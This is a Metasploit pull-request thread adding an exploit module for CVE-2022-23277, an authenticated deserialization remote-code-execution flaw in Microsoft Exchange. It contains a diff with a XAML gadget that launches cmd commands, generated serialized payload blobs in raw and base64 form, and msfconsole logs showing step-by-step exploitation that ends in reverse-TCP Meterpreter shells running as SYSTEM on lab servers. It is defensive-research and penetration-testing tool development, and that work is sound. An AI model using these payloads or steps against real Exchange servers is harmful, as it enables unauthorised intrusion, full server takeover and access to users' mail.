Add exploit for CVE-2022-23277 (Exchange RCE)
rapid7/metasploit-framework pull request #16915
Opened 2022-08-16 21:19 UTC by zeroSteiner

This adds an exploit for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange. This was patched in March 2022 and requires authentication to exploit. This vulnerability is *not* a patch bypass for CVE-2021-42321 but rather leverages another flaw in the filter logic to deserialize a malicious .NET object. Because the mechanism to deliver this is the same as that used in CVE-2021-42321, it makes sense to combine the modules. The user doesn't need to set anything any differently, the Exchange build number will be used to identify which CVE is exploitable and then use that to select the proper gadget chain. Presto, code execution is obtained. The check method will obtain the target Exchange build number to determine which if any CVE the target is vulnerable to and show that information to the user.

## New .NET Gadget Chains
Most of the work to get this exploit functional as updating the existing .NET deserialization logic to add the new `DataSetTypeSpoof` gadget chain. The `DataSetTypeSpoof` gadget chain is a slight variation on the `DataSet` chain which is also added here. It was necessary to fix a few issues in the .NET deserialization code to add these new chains.  The `DataSetTypeSpoof` gadget chain will be used as part of the exploit, and thus validating it is a simple matter of running the exploit. The `DataSet` gadget chain is not used, however, but can be validated by applying the following patch to the `TextFormattingRunProperties` then generating a payload and comparing it to the output from YSoSerial.NET. With the `TextFormattingRunProperties` patch applied, the generated blobs will be identical for, given that the same command is provided to each tool. The patch updates the format of the XML as used by `TextFormattingRunProperties` which is inturn used by both the `DataSet` and `DataSetTypeSpoof` chains. Again, the `DataSetTypeSpoof` chain is demonstratably functional without the patch, showing that it works with the current, unmodified `TextFormattingRunProperties` gadget chain.

<details>
<summary>TextFormattingRunProperties Patch</summary>

```
diff --git lib/msf/util/dot_net_deserialization/gadget_chains/text_formatting_run_properties.rb lib/msf/util/dot_net_deserialization/gadget_chains/text_formatting_run_properties.rb
index 13ea6d4299..ef539bf733 100644
--- lib/msf/util/dot_net_deserialization/gadget_chains/text_formatting_run_properties.rb
+++ lib/msf/util/dot_net_deserialization/gadget_chains/text_formatting_run_properties.rb
@@ -28,6 +28,20 @@ module GadgetChains
         </ResourceDictionary>
       EOS
 
+      resource_dictionary = <<-EOS
+<?xml version="1.0" encoding="utf-16"?>
+<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
+  <ObjectDataProvider.ObjectInstance>
+    <sd:Process>
+      <sd:Process.StartInfo>
+        <sd:ProcessStartInfo Arguments="/c #{cmd.encode(xml: :text)}" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
+      </sd:Process.StartInfo>
+    </sd:Process>
+  </ObjectDataProvider.ObjectInstance>
+</ObjectDataProvider>
+EOS
+      resource_dictionary = resource_dictionary.strip.gsub("\n", "\r\n")
+
       library = Types::RecordValues::BinaryLibrary.new(
         library_id: 2,
         library_name: "Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
```
</details>

## Verification

List the steps needed to make sure this thing works

- [ ] See that the new chains can be generated from the `tools/payloads/ysoserial/dot_net.rb` tool
- [ ] Ensure the unit tests all pass (this shows that even with the bug fixes, the old gadget chains are still the same)
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/exchange_chainedserialization_binder_rce`
- [ ] Set the `HttpUsername`, `HttpPassword`, `RHOSTS` and `DOMAIN` options
- [ ] Run the exploit and obtain a shell

## Demonstration

```
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
[*] No payload configured, defaulting to cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpUsername aliddle
HttpUsername => aliddle
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword Password1!
HttpPassword => Password1!
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN MSFLAB.LOCAL
DOMAIN => MSFLAB.LOCAL
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options 

Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  Password1!       yes       The password to use to authenticate to the Exchange server
   HttpUsername  aliddle          yes       The username to log into the Exchange server as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.159.11   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Command

msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.2.986.15 is vulnerable to CVE-2022-23277
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAACLmD9luiUIToCqtjHJMHTFAAADDlsC
[+] ID value for Inbox folder is AQMkAGMzMmEwZDQyLTJmMmYtNDdlNi04Nzg0LTNiMmNmMTkwZmNjAGIALgAAAwy2SlsLo7NNtRvmAZGoLDABAIuYP2W6JQhOgKq2MckwdMUAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63854) at 2022-08-16  [...]

2022-08-16 21:19 UTC, zeroSteiner commented on lib/msf/util/dot_net_deserialization.rb
> +    return "\x00".b if int == 0
This fixed a bug when encoding a length-prefixed string that was empty. An empty string has a length of 0 and should just be `\x00`.

2022-08-16 21:20 UTC, zeroSteiner commented on lib/msf/util/dot_net_deserialization/types/general.rb
> +          additional_info = additional_infos[additional_info_index].snapshot
The `ClassTypeInfo` does not have a `#value` method that returns a scalar, switch to using snapshot instead to fix this issue.

2022-08-17 20:03 UTC, gwillcox-r7 requested changes
All files reviewed except `lib/msf/util/dot_net_deserialization/gadget_chains/data_set.rb` and `lib/msf/util/dot_net_deserialization/gadget_chains/data_set_type_spoof.rb` which I might need some assistance on due to lack of knowledge of some of the underlying technologies. Rest looks pretty good though but do think we should consider adding in Server 2013 support.

2022-08-17 20:15 UTC, gwillcox-r7 commented
New chains can be generated:

```
 ~/git/metasploit-framework │ feat/mod/cve-2022-23277 *1 ?32  tools/payloads/ysoserial/dot_net.rb -c "whoami" -g DataSetTypeSpoof   
Gadget chain: DataSetTypeSpoof
Formatter:    BinaryFormatter
Size:         1312
����
   mscorlib
           NSystem.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089cSystem.Data.DataSet, System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
DataSet.RemotingFormatDataSet.DataSetNameDataSet.NamespaceDataSet.PrefixDataSet.CaseSensitiveDataSet.LocaleLCID�DataSet.EnforceConstraints�DataSet.ExtendedPropertiesDataSet.Tables.CountDataSet.Tables_0System.Data.SerializationForm����System.Data.SerializationFormatvalue__
	�����
             ^Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunPropertiesForegroundBrush�<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:X="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:S="clr-namespace:System;assembly=mscorlib" xmlns:D="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider X:Key="" ObjectType="{X:Type D:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><S:String>cmd</S:String><S:String>/c whoami</S:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>


 ~/git/metasploit-framework │ feat/mod/cve-2022-23277 *1 ?32  tools/payloads/ysoserial/dot_net.rb -c "whoami" -g DataSetTypeSpoof -o base64
Gadget chain: DataSetTypeSpoof
Formatter:    BinaryFormatter
Size:         1752
AAEAAAD/////AQAAAAAAAAAMAgAAAAhtc2NvcmxpYgwDAAAATlN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAY1N5c3RlbS5EYXRhLkRhdGFTZXQsIFN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoAAAAWRGF0YVNldC5SZW1vdGluZ0Zvcm1hdBNEYXRhU2V0LkRhdGFTZXROYW1lEURhdGFTZXQuTmFtZXNwYWNlDkRhdGFTZXQuUHJlZml4FURhdGFTZXQuQ2FzZVNlbnNpdGl2ZRJEYXRhU2V0LkxvY2FsZUxDSUQaRGF0YVNldC5FbmZvcmNlQ29uc3RyYWludHMaRGF0YVNldC5FeHRlbmRlZFByb3BlcnRpZXMURGF0YVNldC5UYWJsZXMuQ291bnQQRGF0YVNldC5UYWJsZXNfMAQBAQEAAAACAAcfU3lzdGVtLkRhdGEuU2VyaWFsaXphdGlvbkZvcm1hdAMAAAABCAEIAgIAAAAF/P///x9TeXN0ZW0uRGF0YS5TZXJpYWxpemF0aW9uRm9ybWF0AQAAAAd2YWx1ZV9fAAgDAAAAAQAAAAYFAAAAAAkFAAAACQUAAAAACQQAAAAKAQAAAAkGAAAADwYAAADSAgAAAgABAAAA/////wEAAAAAAAAADAIAAABeTWljcm9zb2Z0LlBvd2VyU2hlbGwuRWRpdG9yLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAQk1pY3Jvc29mdC5WaXN1YWxTdHVkaW8uVGV4dC5Gb3JtYXR0aW5nLlRleHRGb3JtYXR0aW5nUnVuUHJvcGVydGllcwEAAAAPRm9yZWdyb3VuZEJydXNoAQIAAAAGAwAAAPQDPFJlc291cmNlRGljdGlvbmFyeSB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpYPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCIgeG1sbnM6Uz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiIHhtbG5zOkQ9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+PE9iamVjdERhdGFQcm92aWRlciBYOktleT0iIiBPYmplY3RUeXBlPSJ7WDpUeXBlIEQ6UHJvY2Vzc30iIE1ldGhvZE5hbWU9IlN0YXJ0Ij48T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+PFM6U3RyaW5nPmNtZDwvUzpTdHJpbmc+PFM6U3RyaW5nPi9jIHdob2FtaTwvUzpTdHJpbmc+PC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz48L09iamVjdERhdGFQcm92aWRlcj48L1Jlc291cmNlRGljdGlvbmFyeT4LCw==
 ~/git/metasploit-framework │ feat/mod/cve-2022-23277 *1 ?32  tools/payloads/ysoserial/dot_net.rb -c "whoami" -g DataSet -o base64 
Gadget chain: DataSet
Formatter:    BinaryFormatter
Size:         1624
AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0CgAAABZEYXRhU2V0LlJlbW90aW5nRm9ybWF0E0RhdGFTZXQuRGF0YVNldE5hbWURRGF0YVNldC5OYW1lc3BhY2UORGF0YVNldC5QcmVmaXgVRGF0YVNldC5DYXNlU2Vuc2l0aXZlEkRhdGFTZXQuTG9jYWxlTENJRBpEYXRhU2V0LkVuZm9yY2VDb25zdHJhaW50cxpEYXRhU2V0LkV4dGVuZGVkUHJvcGVydGllcxREYXRhU2V0LlRhYmxlcy5Db3VudBBEYXRhU2V0LlRhYmxlc18wBAEBAQAAAAIABx9TeXN0ZW0uRGF0YS5TZXJpYWxpemF0aW9uRm9ybWF0AgAAAAEIAQgCAgAAAAX9////H1N5c3RlbS5EYXRhLlNlcmlhbGl6YXRpb25Gb3JtYXQBAAAAB3ZhbHVlX18ACAIAAAABAAAABgQAAAAACQQAAAAJBAAAAAAJBAAAAAoBAAAACQUAAAAPBQAAANICAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA9AM8UmVzb3VyY2VEaWN0aW9uYXJ5IHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOlg9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIiB4bWxuczpTPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiIgeG1sbnM6RD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9c3lzdGVtIj48T2JqZWN0RGF0YVByb3ZpZGVyIFg6S2V5PSIiIE9iamVjdFR5cGU9IntYOlR5cGUgRDpQcm9jZXNzfSIgTWV0aG9kTmFtZT0iU3RhcnQiPjxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz48UzpTdHJpbmc+Y21kPC9TOlN0cmluZz48UzpTdHJpbmc+L2Mgd2hvYW1pPC9TOlN0cmluZz48L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPjwvT2JqZWN0RGF0YVByb3ZpZGVyPjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgsL
 ~/git/metasploit-framework │ feat/mod/cve-2022-23277 *1 ?32     
```

2022-08-17 20:26 UTC, gwillcox-r7 commented
Rebasing this since the branch this was based off of appears to be behind the latest changes and needs some updating.

2022-08-17 21:15 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/exchange_chainedserializationbinder_rce.md
> +Update 5, and Exchange Server 2016 CU22 prior to Security Update 4.
You mean like `Jan22SU`?

2022-08-17 21:17 UTC, zeroSteiner commented on lib/msf/util/dot_net_deserialization/gadget_chains/data_set.rb
> +    # ClaimsPrincipal
Doh, no that's wrong. I copied the splat from the ClaimsPrincipal and forgot to update this field. I'll get it updated.

2022-08-17 21:18 UTC, zeroSteiner commented on lib/msf/util/dot_net_deserialization/gadget_chains/data_set.rb
> +              {type_name: 'System.Data.SerializationFormat', library_id: library.library_id},
I don't think so. I just copied the value from the stream I read which I then used as a template.

2022-08-17 21:19 UTC, zeroSteiner commented on lib/msf/util/dot_net_deserialization/gadget_chains/data_set.rb
> +                member_names: %w[ value__ ]
It's not, this is a literal:

```
[1] pry(main)> %w[ value__ ]
=> ["value__"]
```

2022-08-17 21:32 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb
> +      '15.2.986.15' # Exchange Server 2019 CU11 Jan22SU
Okay so 15.2.986.14 (Exchange Server 2019 CU11 Nov21SU) was missing, I'll add that.

All the other Exchange Server 2016 and Exchange Server 2019 targets are duplicated by CVE-2021-42321. For the purposes of this exploit though, they shouldn't be listed because this is used to determine which gadget chain should be used. When I tried older versions with the `DataSetTypeSpoof` gadget chain, the exploit didn't work. Let me know if you've had different results. The first build in which CVE-2021-42321 was patched, was the first build in which the `DataSetTypeSpoof` gadget chain would execute correctly.

As for Exchange Server 2013, it may be vulnerable but I haven't tested it. I'm not sure it's worth the couple of days it'd take to spin that environment up for testing. We could update the check method though to just flag it as vulnerable but not exploitable.

2022-08-17 21:35 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb
> +      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277")
This is related to a known limitiation we currently have. Currently check methods can't return which CVEs were found to be vulnerable / safe. When the module returns that the target appears vulnerable, all the CVEs that the module references are associated with the vuln in the database. We could update the message that's printed, but related to my previous comment, what I've observed is that the `DataSetTypeSpoof` gadget chain actually doesn't work on the CVE-2021-42321 targets.

I don't really see a lot of value in updating the message to say it's vulnerable to both when the module is just going to use the older technique.

2022-08-17 21:40 UTC, zeroSteiner commented on lib/msf/util/dot_net_deserialization/types/record_values.rb
> +    uint8                 :primitive_type_enum
BinData will raise an exception when `primitive_type_enum` isn't in the choices because there's no default defined.

2022-08-18 15:16 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/exchange_chainedserializationbinder_rce.md
> +Update 5, and Exchange Server 2016 CU22 prior to Security Update 4.
Yep

2022-08-18 15:18 UTC, gwillcox-r7 commented on modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb
> +      CheckCode::Appears("Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277")
Fair point I was mainly just curious as to our capabilities on this to see if this is something we should be doing but appreciate your insight on this. Marking resolved 👍

2022-08-18 21:51 UTC, gwillcox-r7 commented on lib/msf/util/dot_net_deserialization/gadget_chains/data_set.rb
> +                member_names: %w[ value__ ]
Oh woops I misread this. My bad, thanks for pointing that out.

2022-08-18 22:17 UTC, gwillcox-r7 commented
Still works with old vuln:

```
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_rce 
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HTTPUSERNAME Administrator
HTTPUSERNAME => Administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set HttpPassword theAdmin123
HttpPassword => theAdmin123
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set DOMAIN DAFOREST
DOMAIN => DAFOREST
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set RHOST 172.31.152.132
RHOST => 172.31.152.132
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set Target Windows\ Dropper 
Target => Windows Dropper
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > set payload windows/x64/meterpreter_reverse_tcp 
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > show options

Module options (exploit/windows/http/exchange_chainedserializationbinder_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  theAdmin123      yes       The password to use to authenticate to the Ex
                                            change server
   HttpUsername  Administrator    yes       The username to log into the Exchange server
                                            as
   Proxies                        no        A proxy chain of format type:host:port[,type:
                                            host:port][...]
   RHOSTS        172.31.152.132   yes       The target host(s), see https://github.com/ra
                                            pid7/metasploit-framework/wiki/Using-Metasplo
                                            it
   RPORT         443              yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
                                             on. This must be an address on the local mac
                                            hine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is
                                            randomly generated)
   TARGETURI     /                yes       Base path
   URIPATH                        no        The URI to use for this exploit (default is r
                                            andom)
   VHOST                          no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
                                          ess, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       172.31.148.8     yes       The listen address (an interface may be specifi
                                          ed)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Dropper


msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit

[*] Started reverse TCP handler on 172.31.148.8:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is vulnerable to CVE-2021-42321
[*] Using URL: http://172.31.148.8:8080/N2DMjJWu7Oau
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABWvYQUH2snT4wyrq7Wk7QRAAAAAAxA
[+] ID value for Inbox folder is AAMkADE1OTgzOTlmLTVhYzYtNGI5NS04OTk0LTI0NmNkZmFjOWM5NgAuAAAAAAAAjLnV4qTdRZ410A8OBxUaAQBWvYQUH2snT4wyrq7Wk7QRAAAAAAEMAAA=
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Command Stager progress - 100.00% done (150/150 bytes)
[*] Client 172.31.152.132 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859) requested /N2DMjJWu7Oau
[*] Sending payload to 172.31.152.132 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859)
[*] Meterpreter session 2 opened (172.31.148.8:4444 -> 172.31.152.132:12934) at 2022-08-18 17:13:46 -0500
[*] Server stopped.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BR0CCBA815B
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DAFOREST
Logged On Users : 17
Meterpreter     : x64/windows
meterpreter >
```

2022-08-18 23:04 UTC, gwillcox-r7 commented
Also works with CVE-2022-23277 with latest patches before the fix was implemented:

```
msf6 exploit(windows/http/exchange_chainedserializationbinder_rce) > exploit

[*] Started reverse TCP handler on 172.31.148.8:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is an Exchange Server!
[+] The target appears to be vulnerable. Exchange Server 15.2.986.15 is vulnerable to CVE-2022-23277
[*] Using URL: http://172.31.148.8:8080/1GbtiP
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABWvYQUH2snT4wyrq7Wk7QRAAAAGTck
[+] ID value for Inbox folder is AAMkADE1OTgzOTlmLTVhYzYtNGI5NS04OTk0LTI0NmNkZmFjOWM5NgAuAAAAAAAAjLnV4qTdRZ410A8OBxUaAQBWvYQUH2snT4wyrq7Wk7QRAAAAAAEMAAA=
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Client 172.31.152.132 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859) requested /1GbtiP
[*] Sending payload to 172.31.152.132 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859)
[*] Meterpreter session 3 opened (172.31.148.8:4444 -> 172.31.152.132:23912) at 2022-08-18 18:01:43 -0500
[*] Command Stager progress - 100.00% done (144/144 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeTcbPrivilege

meterpreter >
```

2022-08-19 16:10 UTC, gwillcox-r7 approved these changes

2022-08-19 16:10 UTC, gwillcox-r7 commented
Going to merge this so long now but we likely will want to look at expanding targets down the line.

2022-08-19 16:12 UTC, merged

2022-08-19 16:15 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.